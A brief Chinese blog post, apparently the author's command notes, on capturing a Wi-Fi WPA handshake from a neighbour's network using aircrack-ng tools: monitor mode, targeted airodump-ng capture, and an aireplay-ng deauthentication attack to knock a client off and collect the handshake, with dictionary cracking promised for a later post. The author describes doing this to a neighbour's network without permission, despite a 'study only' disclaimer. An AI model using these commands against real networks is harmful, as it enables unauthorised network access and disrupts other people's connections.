這篇文章問什麼技術含量,因爲東哥記性不好,目的是爲了記錄一下命令,大家湊合看看不要當真。本教程只作爲學習研究之用,不能用於非法用途!!!
首先開啓無線網卡混雜模式,wlan1是東哥支持蹭網的便攜神器,之前文章有介紹。
airmon-ng start wlan1
然後看看周圍存在的熱點,覬覦鄰居家的無線網絡很久了:)
airodump-ng mon1
然後開始監聽目標網絡,通過--ivs過濾無用數據包,--bssid過濾其他AP,獲取成功後右上角會有顯示。
airodump-ng --ivs -bssid AP的MAC地址 -w 握手包文件名 mon1
然後對目標AP發起死亡***,鄰居家貌似就一個手機在連接,好久才搞到握手包。如果AP正在下載電影,很快就能獲取到握手包。--ignore-negative-one 如果AP工作頻道不確定加上,客戶端MAC地址在之前通過airodump-ng獲取。
aireplay-ng --ignore-negative-one -0 10 -a AP的MAC地址 -c 客戶端的MAC地址 mon1
最後我們可以看到獲取到的握手包。
如何進行字典破解,下回再講。